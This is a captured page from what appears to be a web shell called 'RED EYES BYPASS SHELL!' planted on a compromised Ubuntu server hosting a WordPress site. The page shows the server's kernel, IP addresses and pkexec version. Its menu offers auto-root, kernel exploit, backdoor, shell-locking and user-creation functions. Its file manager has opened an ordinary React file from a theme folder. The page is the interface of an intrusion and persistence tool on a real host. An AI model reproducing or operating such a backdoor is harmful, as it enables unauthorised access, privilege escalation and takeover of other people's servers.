Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
blossom-spa /
src /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
pages
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
index.js
449
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
import domReady from '@wordpress/dom-ready'; import { createRoot } from '@wordpress/element'; import { BrowserRouter as Router } from 'react-router-dom'; import Dashboard from './pages'; import './scss/style.scss'; domReady(() => { const root = createRoot(document.getElementById('cw-dashboard')); root.render( <> <Router> <Dashboard /> </Router> </> ); });
Close